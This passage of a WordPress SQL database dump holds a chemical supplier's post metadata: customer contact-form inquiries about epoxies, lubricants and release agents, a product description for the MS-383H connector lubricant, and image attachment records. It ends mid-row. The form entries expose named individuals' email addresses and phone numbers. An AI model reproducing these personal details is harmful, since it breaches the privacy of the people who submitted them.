INSERT INTO `wp_postmeta` VALUES (32234, 3593, '_field_2', 'df.milvets@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (32235, 3593, '_field_8', '(253) 722-3189'); 
INSERT INTO `wp_postmeta` VALUES (32236, 3593, '_field_3', 'Hello to the Staff:\r\n    our group is a 501,C-19 non-profit whose mission is to teach mfg technology to our most deserving citizen, our DisAbled American Veteran. part of our course includes resin &amp; composite theory &amp; practice. we wish to concentrate on various ratios of epoxy/resole phenolic mixtures. we intend to instruct how they shall mfg circuit cards out of these mixtures utilizing various textiles, including E-glass, carbon &amp; kraft paper. as they progress, we shall have them produce structural laminates for various uses: model aircraft, race car &amp; boats. we shall employ approved testing methods.\r\n   can your staff advise us on the ratios (by weight)? we realize there are many types of resoles. one that we have is Georgia Pacific&#039;s #7970 which is no longer mfg, but they do still mfg a similar series. we have collected specs on 4 other mfg &amp; can settle on 1 or 2 from each mfg&#039;r. \r\n    can you help us with the math so we can calculate the ideal ratios, so all of the epoxy is crosslinked with the resole? we understand some of the properties of these mixes. we have modified several small ovens with fans &amp; temp sensors. we also have studied some NASA docs that suggest drawing down on the lams during B-stage to eliminate the blisters caused by the water produced during the cure cycle. they also explain that the lam can then be compressed by platens inside the oven to produce a stiff lam  during C-stage, defect free.\r\n    we are self-funded (for as long as that lasts) &amp; intend to equip these Patriots for a career in mfg.\r\n    thank you for your kind help.\r\n    may God protect our valiant warriors,\r\n                               don anders'); 
INSERT INTO `wp_postmeta` VALUES (32237, 3593, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32238, 3593, '_sub_id', '3593'); 
INSERT INTO `wp_postmeta` VALUES (32239, 3594, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32240, 3594, '_seq_num', '220'); 
INSERT INTO `wp_postmeta` VALUES (32241, 3594, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32242, 3594, '_field_12', 'Sandra Oliveri'); 
INSERT INTO `wp_postmeta` VALUES (32243, 3594, '_field_13', 'Lockheed Martin'); 
INSERT INTO `wp_postmeta` VALUES (32244, 3594, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32245, 3594, '_field_14', 'sandra.oliveri@lmco.com'); 
INSERT INTO `wp_postmeta` VALUES (32246, 3594, '_field_15', '(607) 751-5017'); 
INSERT INTO `wp_postmeta` VALUES (32247, 3594, '_field_16', 'Hello,\nI am doing a material analysis for compliance with Mil-Std-810 method 508 fungus resistance for a military contract.  Has EPON 862 been tested for fungus resistance per Mil-Std-810?   What were the test results?   Thank you for your assistance. \n'); 
INSERT INTO `wp_postmeta` VALUES (32248, 3594, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32249, 3594, '_sub_id', '3594'); 
INSERT INTO `wp_postmeta` VALUES (32250, 3595, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32251, 3595, '_seq_num', '325'); 
INSERT INTO `wp_postmeta` VALUES (32252, 3595, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32253, 3595, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32254, 3595, '_field_1', 'Tom Chinn'); 
INSERT INTO `wp_postmeta` VALUES (32255, 3595, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (32256, 3595, '_field_2', 'tmanch@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (32257, 3595, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32258, 3595, '_field_3', 'Quick question.  About 17 yrs ago, I used your product &quot;Miller-Stephenson TFE Release Agent Dry Lubricant&quot; MS-122N/C02 for lubricating between my Treadmill walking belt and wood deck.  I do not see this made anymore.  Is there a substitute?  The Fitness store sold this to me when I purchased the treadmill.   Im still using the same treadmill to this date and I like your lubricant spray.  \nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (32259, 3595, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32260, 3595, '_sub_id', '3595'); 
INSERT INTO `wp_postmeta` VALUES (32261, 3596, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32262, 3596, '_seq_num', '326'); 
INSERT INTO `wp_postmeta` VALUES (32263, 3596, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32264, 3596, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32265, 3596, '_field_1', 'George McKelvey'); 
INSERT INTO `wp_postmeta` VALUES (32266, 3596, '_field_10', 'Florida Handpieces'); 
INSERT INTO `wp_postmeta` VALUES (32267, 3596, '_field_2', 'fhpgeorge@cfl.rr.com'); 
INSERT INTO `wp_postmeta` VALUES (32268, 3596, '_field_8', '(321) 253-8100'); 
INSERT INTO `wp_postmeta` VALUES (32269, 3596, '_field_3', 'I&#039;m in the handpiece repair business and I&#039;m exploring the possibility of distributing a spray lubricant with my own label.  Id like to know a unit price and minimum purchase requirement.  I can have my own labels printed or supply you with a template.\r\n\r\nRegards,\r\n\r\nGeorge McKelvey'); 
INSERT INTO `wp_postmeta` VALUES (32270, 3596, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32271, 3596, '_sub_id', '3596'); 
INSERT INTO `wp_postmeta` VALUES (32272, 3597, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32273, 3597, '_seq_num', '221'); 
INSERT INTO `wp_postmeta` VALUES (32274, 3597, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32275, 3597, '_field_12', 'James Panasiewicz'); 
INSERT INTO `wp_postmeta` VALUES (32276, 3597, '_field_13', 'LSI Solutions'); 
INSERT INTO `wp_postmeta` VALUES (32277, 3597, '_field_18', '2095755'); 
INSERT INTO `wp_postmeta` VALUES (32278, 3597, '_field_14', 'jpanasiewicz@lsisolutions.com'); 
INSERT INTO `wp_postmeta` VALUES (32279, 3597, '_field_15', '(585) 869-6643'); 
INSERT INTO `wp_postmeta` VALUES (32280, 3597, '_field_16', 'We purchased a case (12 total) of MS-122AD PTFE Release agent/ dry lubricant in October 2016 purchase order 36164. My question is there a shelf life / expiration date for this product?\r\nRegards,\r\nJim Panasiewicz '); 
INSERT INTO `wp_postmeta` VALUES (32281, 3597, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32282, 3597, '_sub_id', '3597'); 
INSERT INTO `wp_postmeta` VALUES (32283, 3598, '_wp_attached_file', '2017/02/3100MD-3170MD-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (32284, 3600, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32285, 3600, '_seq_num', '327'); 
INSERT INTO `wp_postmeta` VALUES (32286, 3600, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32287, 3600, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32288, 3600, '_field_1', 'Ryan Brooks'); 
INSERT INTO `wp_postmeta` VALUES (32289, 3600, '_field_10', 'Viconic Defense, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (32290, 3600, '_field_2', 'rbrooks@viconicdefense.com'); 
INSERT INTO `wp_postmeta` VALUES (32291, 3600, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32292, 3600, '_field_3', 'Hello. I am looking for a suggestion on a release agent for thermoplastic urethane plastic being thermoformed over a polyurethane mold. The part is molded at approximately 390F and released at approximately 100F.  If so, do you have something available in container larger than aerosol cans? We currently using a dry PTFE that works acceptably, but we are using a lot of it. We are looking to go to more of an automated system for larger volumes and are open to using a better product.'); 
INSERT INTO `wp_postmeta` VALUES (32293, 3600, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32294, 3600, '_sub_id', '3600'); 
INSERT INTO `wp_postmeta` VALUES (32295, 3601, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32296, 3601, '_seq_num', '328'); 
INSERT INTO `wp_postmeta` VALUES (32297, 3601, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32298, 3601, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32299, 3601, '_field_1', 'breugnon'); 
INSERT INTO `wp_postmeta` VALUES (32300, 3601, '_field_10', 'ceclaindustrie'); 
INSERT INTO `wp_postmeta` VALUES (32301, 3601, '_field_2', 'breugnon@ceclaindustrie.fr'); 
INSERT INTO `wp_postmeta` VALUES (32302, 3601, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32303, 3601, '_field_3', 'Bonjour,\n\nJe recherche une vernis spécifique pour l’imprégnation.\nde type : Isonel 31J, 2025HFP, 101450 UDD  ou 2005 HFP\nMerci de votre réponse.\nCordialement\n'); 
INSERT INTO `wp_postmeta` VALUES (32304, 3601, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32305, 3601, '_sub_id', '3601'); 
INSERT INTO `wp_postmeta` VALUES (32306, 3602, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32307, 3602, '_seq_num', '222'); 
INSERT INTO `wp_postmeta` VALUES (32308, 3602, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32309, 3602, '_field_12', 'James Perdue'); 
INSERT INTO `wp_postmeta` VALUES (32310, 3602, '_field_13', 'Yale Rope Technologies'); 
INSERT INTO `wp_postmeta` VALUES (32311, 3602, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32312, 3602, '_field_14', 'jperdue@yalecordage.com'); 
INSERT INTO `wp_postmeta` VALUES (32313, 3602, '_field_15', '(704) 630-0331'); 
INSERT INTO `wp_postmeta` VALUES (32314, 3602, '_field_16', 'Attention Chris:\r\nWater Based Silicon Coating for rope core'); 
INSERT INTO `wp_postmeta` VALUES (32315, 3602, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32316, 3602, '_sub_id', '3602'); 
INSERT INTO `wp_postmeta` VALUES (32317, 3603, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32318, 3603, '_seq_num', '329'); 
INSERT INTO `wp_postmeta` VALUES (32319, 3603, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32320, 3603, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32321, 3603, '_field_1', 'Seth Hara'); 
INSERT INTO `wp_postmeta` VALUES (32322, 3603, '_field_10', 'Mayo Clinic'); 
INSERT INTO `wp_postmeta` VALUES (32323, 3603, '_field_2', 'hara.seth@mayo.edu'); 
INSERT INTO `wp_postmeta` VALUES (32324, 3603, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32325, 3603, '_field_3', 'I&#039;d like to purchase Metaphenylenediamine as a curing agent for Epon 828. Do you carry it or must I purchase it from Dupont?'); 
INSERT INTO `wp_postmeta` VALUES (32326, 3603, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32327, 3603, '_sub_id', '3603'); 
INSERT INTO `wp_postmeta` VALUES (32328, 3606, '_edit_lock', '1487103586:2'); 
INSERT INTO `wp_postmeta` VALUES (32329, 3606, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (32330, 3607, '_wp_attached_file', '2017/02/shutterstock_142198558.jpg'); 
INSERT INTO `wp_postmeta` VALUES (32331, 3607, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:429;s:4:"file";s:34:"2017/02/shutterstock_142198558.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_142198558-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_142198558-800x343.jpg";s:5:"width";i:800;s:6:"height";i:343;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_142198558-768x329.jpg";s:5:"width";i:768;s:6:"height";i:329;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_142198558-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_142198558-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_142198558-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_142198558-510x429.jpg";s:5:"width";i:510;s:6:"height";i:429;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (32332, 3606, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (32333, 3606, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (32334, 3606, '_thumbnail_id', '3607'); 
INSERT INTO `wp_postmeta` VALUES (32335, 3606, '312_default_editor', '<strong>Maximum Operating Temperatures</strong>\r\n\r\nEstimated 20 year film life 230°F/110°C\r\n\r\nEstimated 5 year film life 257°F/125°C\r\n\r\nNote: Higher temperatures result in shorter film life.\r\n\r\n<strong>Physical Properties: 6-ring Polyphenyl Ether</strong>\r\n\r\nSurface Tension 54.2 dynes/cm\r\n\r\n<strong>Evaporation Loss</strong> (ASTMD-972) 6.5 hrs.\r\n\r\n400°F/204°C @ 760mm 0.04%\r\n\r\n500°F/260°C @ 760mm 0.50%\r\n\r\n500°F/260°C @ 140mm 1.10%\r\n\r\n&nbsp;\r\n\r\n<strong>Thermal Stability</strong> 836°F/447°C\r\n\r\n<strong>Low-Temperature Performance:</strong> Performs consistently over a wide range of low temperatures to – 20°C.\r\n\r\n<strong>Electrical Properties: 6-ring Polyphenyl Ether</strong>\r\n\r\nDielectric Constant                      60cy           1kc        10kc       100kc\r\n\r\n(@ 77°F/25°C)                            4.54            4.54       4.55        4.53\r\n\r\n<strong>Resistivity</strong> @ 77°F/25°C @ 500VDC 1.56 x 1014ohm-cm\r\n\r\n<strong>Dielectric Strength</strong> 43 Kv\r\n\r\nNote: Test for compatibility before use.\r\n\r\nSafety Data Sheets (SDS) are available upon request.\r\n\r\nFor technical support:\r\n\r\n800-992-2424 (8-4 ET) in the U.S.\r\n\r\n800-323-4621 (8-4 ET) in Canada.\r\n\r\ne-mail: support@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (32336, 3606, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (32337, 3606, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (32338, 3606, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (32339, 3606, '317_default_editor', '<p class="h10"><strong>MS-383H </strong>(1 oz, 4 oz, 8 oz, Qt, Gal, 5G, 55G)</p>'); 
INSERT INTO `wp_postmeta` VALUES (32340, 3606, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (32341, 3606, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (32342, 3606, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (32343, 3606, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (32344, 3606, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (32345, 3606, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (32346, 3606, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32347, 3606, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32348, 3606, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (32349, 3606, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32350, 3606, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (32351, 3606, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (32352, 3606, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (32353, 3606, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (32354, 3606, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (32355, 3606, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (32356, 3606, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (32357, 3606, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (32358, 3606, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (32359, 3606, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (32360, 3606, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (32361, 3606, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (32362, 3606, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32363, 3606, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32364, 3606, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (32365, 3606, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (32366, 3606, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (32367, 3606, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (32368, 3606, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32369, 3606, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32370, 3606, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (32371, 3606, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (32372, 3606, '_ywtm_content_tab_description', '<h3>MS-383H Connector Lubricant</h3>\r\nBy combining the superior lubricating qualities of Polyphenyl Ether with the cleaning power of a hydrofluoroether azeotrope, Miller-Stephenson has created Connector Lubricant, MS-383H, a formulation that provides the most advanced total treatment for connectors.\r\n\r\nADVANTAGES:\r\n<ul>\r\n 	<li>Cleans, lubricates and protects multi-pin connectors</li>\r\n 	<li>Reduces insertion forces  Greatly increases mating cycles (especially important where high pin counts are involved)</li>\r\n 	<li>Extends connector life by preventing corrosion and galling</li>\r\n 	<li>Removes contaminates and oxides.</li>\r\n 	<li>Is non-migrating-contains no silicones.</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li>Available with an UV (ultraviolet) indicator</li>\r\n 	<li>No interference in electrical continuity</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>NSN 6850-01-519-8521 (MS-381H)</li>\r\n 	<li>NSN-6850-01-538-3496 (MS-383H)</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\nVOC content of MS-381H....................................524gms/l\r\n\r\nVOC content of MS-381HC.................................522gms/l\r\n\r\nVOC content of MS-383H....................................699gms/l\r\n\r\nThe active ingredient of Connector Lubricant is a six (6) ring polyphenyl ether lubricant. This lubricant will help protect metal connector surfaces from excessive wear, when subjected to hundreds of mating cycles, thereby increasing the life of the connectors. It will also reduce insertion forces and provide corrosion protection in harsh environments.\r\n\r\nPolyphenyl ethers (PPE) are very viscous fluids and only a very thin film is required. Connector Lubricant is available in 1% and 2% PPE concentrations for different applications. 1% (MS- 381H Series) and 2% (MS-381HC/383H Series) are at the proper concentration for connectors operating at room temperatures where there is little or no vibration. Higher concentrations are available in Bulk formulations.\r\n\r\nA Spectro EN-140 4-watt Long Wave UV Lamp may be used for UV detection.'); 
INSERT INTO `wp_postmeta` VALUES (32373, 3606, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (32374, 3606, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (32375, 3606, '_yoast_wpseo_primary_product_cat', '262'); 
INSERT INTO `wp_postmeta` VALUES (32376, 3606, '_yoast_wpseo_focuskw_text_input', 'MS-383H'); 
INSERT INTO `wp_postmeta` VALUES (32377, 3606, '_yoast_wpseo_focuskw', 'MS-383H'); 
INSERT INTO `wp_postmeta` VALUES (32378, 3606, '_yoast_wpseo_title', 'MS-383H Connector Lubricant - Miller-Stephenson Chemical'); 
INSERT INTO `wp_postmeta` VALUES (32379, 3606, '_yoast_wpseo_metadesc', 'Miller-Stephenson has created Connector Lubricant (MS-383H), a formulation that provides the most advanced total treatment for connectors.'); 
INSERT INTO `wp_postmeta` VALUES (32380, 3606, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (32381, 3606, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (32382, 3606, '_yoast_wpseo_linkdex', '93'); 
INSERT INTO `wp_postmeta` VALUES (32383, 3608, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32384, 3608, '_seq_num', '330'); 
INSERT INTO `wp_postmeta` VALUES (32385, 3608, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32386, 3608, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32387, 3608, '_field_1', 'Tom Pope'); 
INSERT INTO `wp_postmeta` VALUES (32388, 3608, '_field_10', 'Midwest Electric'); 
INSERT INTO `wp_postmeta` VALUES (32389, 3608, '_field_2', 'service@midwest4you.com'); 
INSERT INTO `wp_postmeta` VALUES (32390, 3608, '_field_8', '(630) 279-8000'); 
INSERT INTO `wp_postmeta` VALUES (32391, 3608, '_field_3', 'We are looking for Benalene 930-2 Grease. If available please quote prices. We can use it in 5 gallon vats. Thank you. Tom'); 
INSERT INTO `wp_postmeta` VALUES (32392, 3608, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32393, 3608, '_sub_id', '3608'); 
INSERT INTO `wp_postmeta` VALUES (32394, 3610, '_edit_lock', '1495048089:3'); 
INSERT INTO `wp_postmeta` VALUES (32395, 3610, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (32396, 3610, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (32397, 3610, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (32398, 3610, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (32399, 3610, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (32400, 3610, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (32401, 3610, '_yoast_wpseo_primary_category', '512'); 
INSERT INTO `wp_postmeta` VALUES (32402, 3612, '_wp_attached_file', '2017/02/shutterstock_300125900.jpg'); 
INSERT INTO `wp_postmeta` VALUES (32403, 3612, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/02/shutterstock_300125900.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_300125900-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_300125900-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_300125900-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_300125900-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_300125900-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_300125900-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_300125900-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (32404, 3610, '_thumbnail_id', '3612'); 
INSERT INTO `wp_postmeta` VALUES (32405, 3614, '_wp_attached_file', '2017/02/shutterstock_441571792.jpg'); 
INSERT INTO `wp_postmeta` VALUES (32406, 3614, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/02/shutterstock_441571792.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_441571792-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_441571792-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_441571792-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_441571792-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_441571792-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_441571792-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_441571792-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (32407, 3615, '_wp_attached_file', '2017/02/shutterstock_349523072.jpg'); 
INSERT INTO `wp_postmeta` VALUES (32408, 3615, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/02/shutterstock_349523072.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_349523072-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_349523072-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_349523072-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_349523072-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_349523072-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_349523072-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_349523072-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso"